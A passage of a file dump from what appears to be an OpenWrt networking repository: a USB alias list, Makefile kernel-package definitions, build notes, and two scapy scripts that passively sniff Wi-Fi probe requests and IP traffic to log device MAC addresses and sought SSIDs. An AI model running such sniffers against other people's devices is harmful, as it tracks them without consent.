dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p3072d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7711d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p4085d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1A32p0304d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2310d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Ad*dc*dsc*dp*ic*isc*
ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C16d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C17d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1D4Dp000Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1D4Dp000Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1D4Dp0011d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p5257d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0283d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0945d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0947d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0948d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v203Dp1480d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v20B8p8888d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1784d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v203Dp14A9d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p899Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3870d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p870Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p6899d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3822d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3871d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p871Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p822Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3821d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p821Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0282d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA703d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3307d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3321d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3329d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07FAp7712d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0166d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p341Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p341Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p343Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2210d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApB511d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3572d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9801d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0041d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0042d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0944d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0740d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0744d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0284d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v167Bp4001d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0764d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0930p0A07d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0761d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13B1p002Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1737p0079d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0065d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0066d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0068d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3370d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0050d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApB511d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p20DDd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS
(\"usb:v148Fp3573d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7733d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0846p9012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0067d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1875p7733d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0E66p0021d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019pED19d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp5370d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp5372d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3365d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3329d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C15d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C19d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A12d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A22d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A32d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A42d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04DAp1800d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04DAp1801d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04DAp23F6d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2104d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2180d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2181d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2182d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2126d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v057Cp8501d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp5572d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A32d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A13d*dc*dsc*dp*ic*isc*ip*\");\n\nMODULE_INFO(srcversion, \"0437D721DA31F3109C8F9D3\");\n"
},
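
The MODULE_ALIAS strings in the rt2870sta entry above encode the USB device IDs the driver binds to, in the form usb:vVVVVpPPPPd*dc*... A small standalone sketch (not part of any repo in this dump) that pulls the vendor/product pairs out of such a .mod.c listing:

import re

# usb alias format emitted into modules.mod.c: usb:v<VID>p<PID>d*dc*dsc*dp*ic*isc*ip*
ALIAS_RE = re.compile(r'usb:v([0-9A-F]{4})p([0-9A-F]{4})d')

def usb_ids(mod_c_source):
    # Yields (vendor, product) integer pairs found in the dump
    for vid, pid in ALIAS_RE.findall(mod_c_source):
        yield int(vid, 16), int(pid, 16)

sample = 'MODULE_ALIAS("usb:v148Fp2770d*dc*dsc*dp*ic*isc*ip*");'
print(list(usb_ids(sample)))  # [(5263, 10096)], i.e. vendor 0x148F, product 0x2770
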
{
"alpha_fraction": 0.4198019802570343,
"alphanum_fraction": 0.4376237690448761,
"avg_line_length": 28.647058486938477,
"blob_id": "32e38f0df11dcf2b2227c7056d989e801de8e4bb",
"content_id": "60e5d754c6838f9a9817be41324476dc55a679c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 17,
"path": "/python/scapy/probe-requests.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom scapy.all import *\nimport sys\n\ninterface = sys.argv[1] \n\ndef proc(p):\n if ( p.haslayer(Dot11ProbeReq) ):\n mac=re.sub(':','',p.addr2)\n ssid=p[Dot11Elt].info\n ssid=ssid.decode('utf-8','ignore')\n if ssid == \"\":\n ssid=\"<BROADCAST>\"\n print \"%s:%s\" %(mac,ssid)\n \nsniff(iface=interface, prn=proc, store=0)\n\n"
},
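
The probe-request sniffer above is written for Python 2 (print statements, implicit byte strings). A minimal Python 3 port, as a sketch: it assumes scapy is installed and that the interface, here the placeholder name wlan0mon, is already in monitor mode.

#!/usr/bin/env python3
from scapy.all import sniff, Dot11ProbeReq, Dot11Elt

def handle(pkt):
    # Only probe requests carry the SSID the client is searching for
    if pkt.haslayer(Dot11ProbeReq):
        mac = pkt.addr2.replace(':', '')
        ssid = pkt[Dot11Elt].info.decode('utf-8', 'ignore') or '<BROADCAST>'
        print('%s:%s' % (mac, ssid))

sniff(iface='wlan0mon', prn=handle, store=0)  # placeholder interface name
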
{
"alpha_fraction": 0.7692307829856873,
"alphanum_fraction": 0.8027295470237732,
"avg_line_length": 49.25,
"blob_id": "dac7cf4137341c5a29b166146a0fc22efa443850",
"content_id": "fbabb07de976a78e7b4e61d4f9de17bcd206f17f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 16,
"path": "/notes/relay-igmpproxy-arpnet-bridge.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "TODO\n\nWhen configuring the relayd eethernet to wireless wan use case it was thought that the arpnet with igmpproxy needed these patches. And perhaps it does, but not for my use case at the time.\n\nOpenwrt with ARPNAT reference:\nhttp://projectgus.com/2010/03/wireless-client-bridging-with-openwrt/\n\nThis is a patch from the Gargoyle fork for ARPNAT:\nhttp://www.gargoyle-router.com/gargoyle\n\nIt is to be applied to attitude adjustment branch and build also including ebtables when using configuration options client_bridge=1.\n\nhttps://forum.openwrt.org/viewtopic.php?id=30185&p=2\nhttps://forum.openwrt.org/viewtopic.php?id=42614\nhttp://www.gargoyle-router.com/gargoyle/projects/gargoyle/repository/revisions/master/entry/patches-generic/04-arpnat.patch\nhttp://www.dd-wrt.com/phpBB2/viewtopic.php?t=161963\n\n\n"
},
{
"alpha_fraction": 0.33076924085617065,
"alphanum_fraction": 0.3403846025466919,
"avg_line_length": 35,
"blob_id": "29565f0443f680d0e470c085cace0f7d4ad99730",
"content_id": "8992dafb1cebaaf4a58193280eb1efdfdfddd6ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1040,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 23,
"path": "/python/scapy/monitor-ip-mac.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom scapy.all import *\nimport re\nimport sys\n\ninterface = sys.argv[1] \nbaseMAC = sys.argv[2] \nIPregex = sys.argv[3]\nreg=re.compile(IPregex)\n\ndef monitorIPMAC(p): \n if p.haslayer(IP):\n iplayer = p.getlayer(IP)\n if reg.match(iplayer.src) or reg.match(iplayer.dst):\n if not (p.addr1==baseMAC or p.addr2==baseMAC or p.addr3==baseMAC): \n print \"---\"\n print \"MAC->\"+p.addr1+\"|\"+p.addr2+\"|\"+p.addr3\n print \"IP->\"+iplayer.src+\"|\"+iplayer.dst\n print \"---\" \n \n \nsniff(iface=interface,prn=monitorIPMAC,store=0)\n \n \n"
},
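
monitor-ip-mac.py applies its IP-range regex in Python, so every captured frame crosses into userspace before being tested. When sniffing on a regular ethernet-side interface it is usually cheaper to let libpcap pre-filter in the kernel with a BPF expression; a sketch under those assumptions (interface name and subnet are placeholders):

from scapy.all import sniff, IP

def show(pkt):
    ip = pkt[IP]
    print('%s -> %s' % (ip.src, ip.dst))

# The BPF filter drops non-matching packets before they reach Python
sniff(iface='ra0', filter='net 10.0.0.0/24', prn=show, store=0)
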
{
"alpha_fraction": 0.7707865238189697,
"alphanum_fraction": 0.7775281071662903,
"avg_line_length": 72.33333587646484,
"blob_id": "ca0f399a90b8caefac026c31fe3d92f107f9ce3e",
"content_id": "bbc9b72e68ac861a780a5edd89e6d52deb2f3fca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 6,
"path": "/notes/openvpn-fix-build-attitude-adjustment.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "\nIt is not clear what I did that night when trying to get the LuCI application for openvpn configured and built. But to the bes of my recollection it went something like this.\n\nIn general the luci-app-openvpn was available, but not showing up in menuconfig and the patch was used to hand apply changes to the core package to get it going. A copy of the patch is provided to reconstruct the fix.\n\n\nhttp://luci.subsignal.org/trac/ticket/489\n\n\n\n\n"
},
{
"alpha_fraction": 0.7355652451515198,
"alphanum_fraction": 0.7431961297988892,
"avg_line_length": 26.246395111083984,
"blob_id": "607fc61054d22fcea328403726bfcf5c51eebcd1",
"content_id": "e80c01d52443f044abd83a00bf83ca2a9d60d8ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 22671,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 832,
"path": "/packages/kernel/modules/netfilter.mk",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "\n#\n# Copyright (C) 2006-2010 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\nNF_MENU:=Netfilter Extensions\nNF_KMOD:=1\ninclude $(INCLUDE_DIR)/netfilter.mk\n\ndefine KernelPackage/ipt-core\n SUBMENU:=$(NF_MENU)\n TITLE:=Netfilter core\n KCONFIG:= \\\n \tCONFIG_NETFILTER=y \\\n\tCONFIG_NETFILTER_ADVANCED=y \\\n\t$(KCONFIG_IPT_CORE)\n FILES:=$(foreach mod,$(IPT_CORE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,40,$(notdir $(IPT_CORE-m)))\nendef\n\ndefine KernelPackage/ipt-core/description\n Netfilter core kernel modules\n Includes:\n - comment\n - limit\n - LOG\n - mac\n - multiport\n - REJECT\n - TCPMSS\n-core\nendef\n\n$(eval $(call KernelPackage,ipt-core))\n\n\ndefine AddDepends/ipt\n SUBMENU:=$(NF_MENU)\n DEPENDS+= kmod-ipt-core $(1)\nendef\n\n\ndefine KernelPackage/ipt-conntrack\n TITLE:=Basic connection tracking modules\n KCONFIG:=$(KCONFIG_IPT_CONNTRACK)\n FILES:=$(foreach mod,$(IPT_CONNTRACK-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,41,$(notdir $(IPT_CONNTRACK-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-conntrack/description\n Netfilter (IPv4) kernel modules for connection tracking\n Includes:\n - conntrack\n - defrag\n - iptables_raw\n - NOTRACK\n - state\nendef\n\n$(eval $(call KernelPackage,ipt-conntrack))\n\n\ndefine KernelPackage/ipt-conntrack-extra\n TITLE:=Extra connection tracking modules\n KCONFIG:=$(KCONFIG_IPT_CONNTRACK_EXTRA)\n FILES:=$(foreach mod,$(IPT_CONNTRACK_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,42,$(notdir $(IPT_CONNTRACK_EXTRA-m)))\n $(call AddDepends/ipt,+kmod-ipt-conntrack)\nendef\n\ndefine KernelPackage/ipt-conntrack-extra/description\n Netfilter (IPv4) extra kernel modules for connection tracking\n Includes:\n - connbytes\n - connmark/CONNMARK\n - conntrack\n - helper\n - recent\nendef\n\n$(eval $(call KernelPackage,ipt-conntrack-extra))\n\n\ndefine KernelPackage/ipt-filter\n TITLE:=Modules for packet content inspection\n KCONFIG:=$(KCONFIG_IPT_FILTER)\n FILES:=$(foreach mod,$(IPT_FILTER-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_FILTER-m)))\n $(call AddDepends/ipt,+kmod-lib-textsearch)\nendef\n\ndefine KernelPackage/ipt-filter/description\n Netfilter (IPv4) kernel modules for packet content inspection\n Includes:\n - layer7\n - string\nendef\n\n$(eval $(call KernelPackage,ipt-filter))\n\n\ndefine KernelPackage/ipt-ipopt\n TITLE:=Modules for matching/changing IP packet options\n KCONFIG:=$(KCONFIG_IPT_IPOPT)\n FILES:=$(foreach mod,$(IPT_IPOPT-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_IPOPT-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-ipopt/description\n Netfilter (IPv4) modules for matching/changing IP packet options\n Includes:\n - CLASSIFY\n - dscp/DSCP\n - ecn/ECN\n - hl/HL\n - length\n - mark/MARK\n - statistic\n - tcpmss\n - time\n - ttl/TTL\n - unclean\nendef\n\n$(eval $(call KernelPackage,ipt-ipopt))\n\n\ndefine KernelPackage/ipt-ipsec\n TITLE:=Modules for matching IPSec packets\n KCONFIG:=$(KCONFIG_IPT_IPSEC)\n FILES:=$(foreach mod,$(IPT_IPSEC-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_IPSEC-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-ipsec/description\n Netfilter (IPv4) modules for matching IPSec packets\n Includes:\n - ah\n - esp\n - policy\nendef\n\n$(eval $(call KernelPackage,ipt-ipsec))\n\n\ndefine KernelPackage/ipt-nat\n 
TITLE:=Basic NAT targets\n KCONFIG:=$(KCONFIG_IPT_NAT)\n FILES:=$(foreach mod,$(IPT_NAT-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,42,$(notdir $(IPT_NAT-m)))\n $(call AddDepends/ipt,+kmod-ipt-conntrack)\nendef\n\ndefine KernelPackage/ipt-nat/description\n Netfilter (IPv4) kernel modules for basic NAT targets\n Includes:\n - MASQUERADE\nendef\n\n$(eval $(call KernelPackage,ipt-nat))\n\n\ndefine KernelPackage/ipt-nat-extra\n TITLE:=Extra NAT targets\n KCONFIG:=$(KCONFIG_IPT_NAT_EXTRA)\n FILES:=$(foreach mod,$(IPT_NAT_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,43,$(notdir $(IPT_NAT_EXTRA-m)))\n $(call AddDepends/ipt,+kmod-ipt-nat)\nendef\n\ndefine KernelPackage/ipt-nat-extra/description\n Netfilter (IPv4) kernel modules for extra NAT targets\n Includes:\n - NETMAP\n - REDIRECT\nendef\n\n$(eval $(call KernelPackage,ipt-nat-extra))\n\n\ndefine KernelPackage/ipt-nathelper\n TITLE:=Basic Conntrack and NAT helpers\n KCONFIG:=$(KCONFIG_IPT_NATHELPER)\n FILES:=$(foreach mod,$(IPT_NATHELPER-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_NATHELPER-m)))\n $(call AddDepends/ipt,+kmod-ipt-nat)\nendef\n\ndefine KernelPackage/ipt-nathelper/description\n Default Netfilter (IPv4) Conntrack and NAT helpers\n Includes:\n - ftp\n - irc\n - tftp\nendef\n\n$(eval $(call KernelPackage,ipt-nathelper))\n\n\ndefine KernelPackage/ipt-nathelper-extra\n TITLE:=Extra Conntrack and NAT helpers\n KCONFIG:=$(KCONFIG_IPT_NATHELPER_EXTRA)\n FILES:=$(foreach mod,$(IPT_NATHELPER_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_NATHELPER_EXTRA-m)))\n $(call AddDepends/ipt,+kmod-ipt-nat +kmod-lib-textsearch)\nendef\n\ndefine KernelPackage/ipt-nathelper-extra/description\n Extra Netfilter (IPv4) Conntrack and NAT helpers\n Includes:\n - amanda\n - h323\n - mms\n - pptp\n - proto_gre\n - sip\n - snmp_basic\n - broadcast\nendef\n\n$(eval $(call KernelPackage,ipt-nathelper-extra))\n\n\ndefine KernelPackage/ipt-queue\n TITLE:=Module for user-space packet queueing\n KCONFIG:=$(KCONFIG_IPT_QUEUE)\n FILES:=$(foreach mod,$(IPT_QUEUE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_QUEUE-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-queue/description\n Netfilter (IPv4) module for user-space packet queueing\n Includes:\n - QUEUE\nendef\n\n$(eval $(call KernelPackage,ipt-queue))\n\n\ndefine KernelPackage/ipt-ulog\n TITLE:=Module for user-space packet logging\n KCONFIG:=$(KCONFIG_IPT_ULOG)\n FILES:=$(foreach mod,$(IPT_ULOG-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_ULOG-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-ulog/description\n Netfilter (IPv4) module for user-space packet logging\n Includes:\n - ULOG\nendef\n\n$(eval $(call KernelPackage,ipt-ulog))\n\n\ndefine KernelPackage/ipt-debug\n TITLE:=Module for debugging/development\n KCONFIG:=$(KCONFIG_IPT_DEBUG)\n DEFAULT:=n\n FILES:=$(foreach mod,$(IPT_DEBUG-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_DEBUG-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-debug/description\n Netfilter modules for debugging/development of the firewall\n Includes:\n - TRACE\nendef\n\n$(eval $(call KernelPackage,ipt-debug))\n\n\ndefine KernelPackage/ipt-led\n TITLE:=Module to trigger a LED with a Netfilter rule\n KCONFIG:=$(KCONFIG_IPT_LED)\n FILES:=$(foreach mod,$(IPT_LED-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,61,$(notdir $(IPT_LED-m)))\n 
$(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-led/description\n Netfilter target to trigger a LED when a network packet is matched.\nendef\n\n$(eval $(call KernelPackage,ipt-led))\n\ndefine KernelPackage/ipt-tproxy\n TITLE:=Transparent proxying support\n DEPENDS+=+IPV6:kmod-ipv6\n KCONFIG:= \\\n \tCONFIG_NETFILTER_TPROXY \\\n \tCONFIG_NETFILTER_XT_MATCH_SOCKET \\\n \tCONFIG_NETFILTER_XT_TARGET_TPROXY\n FILES:= \\\n \t$(LINUX_DIR)/net/netfilter/nf_tproxy_core.ko \\\n \t$(foreach mod,$(IPT_TPROXY-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,50,$(notdir nf_tproxy_core $(IPT_TPROXY-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-tproxy/description\n Kernel modules for Transparent Proxying\nendef\n\n$(eval $(call KernelPackage,ipt-tproxy))\n\ndefine KernelPackage/ipt-tee\n TITLE:=TEE support\n KCONFIG:= \\\n \tCONFIG_NETFILTER_XT_TARGET_TEE\n FILES:= \\\n \t$(LINUX_DIR)/net/netfilter/xt_TEE.ko \\\n \t$(foreach mod,$(IPT_TEE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir nf_tee $(IPT_TEE-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-tee/description\n Kernel modules for TEE\nendef\n\n$(eval $(call KernelPackage,ipt-tee))\n\n\ndefine KernelPackage/ipt-u32\n TITLE:=U32 support\n KCONFIG:= \\\n \tCONFIG_NETFILTER_XT_MATCH_U32\n FILES:= \\\n \t$(LINUX_DIR)/net/netfilter/xt_u32.ko \\\n \t$(foreach mod,$(IPT_U32-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir nf_tee $(IPT_U32-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-u32/description\n Kernel modules for U32\nendef\n\n$(eval $(call KernelPackage,ipt-u32))\n\n\ndefine KernelPackage/ipt-iprange\n TITLE:=Module for matching ip ranges\n KCONFIG:=$(KCONFIG_IPT_IPRANGE)\n FILES:=$(foreach mod,$(IPT_IPRANGE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_IPRANGE-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-iprange/description\n Netfilter (IPv4) module for matching ip ranges\n Includes:\n - iprange\nendef\n\n$(eval $(call KernelPackage,ipt-iprange))\n\n\ndefine KernelPackage/ipt-extra\n TITLE:=Extra modules\n KCONFIG:=$(KCONFIG_IPT_EXTRA)\n FILES:=$(foreach mod,$(IPT_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_EXTRA-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-extra/description\n Other Netfilter (IPv4) kernel modules\n Includes:\n - owner\n - physdev (if bridge support was enabled in kernel)\n - pkttype\n - quota\nendef\n\n$(eval $(call KernelPackage,ipt-extra))\n\n\ndefine KernelPackage/ip6tables\n SUBMENU:=$(NF_MENU)\n TITLE:=IPv6 modules\n DEPENDS:=+kmod-ipv6\n KCONFIG:=$(KCONFIG_IPT_IPV6)\n FILES:=$(foreach mod,$(IPT_IPV6-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(IPT_IPV6-m)))\nendef\n\ndefine KernelPackage/ip6tables/description\n Netfilter IPv6 firewalling support\nendef\n\n$(eval $(call KernelPackage,ip6tables))\n\n\ndefine KernelPackage/arptables\n SUBMENU:=$(NF_MENU)\n TITLE:=ARP firewalling modules\n FILES:=$(LINUX_DIR)/net/ipv4/netfilter/arp*.ko\n KCONFIG:=CONFIG_IP_NF_ARPTABLES \\\n CONFIG_IP_NF_ARPFILTER \\\n CONFIG_IP_NF_ARP_MANGLE\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(patsubst %.ko,%,$(wildcard $(LINUX_DIR)/net/ipv4/netfilter/arp*.ko))))\nendef\n\ndefine KernelPackage/arptables/description\n 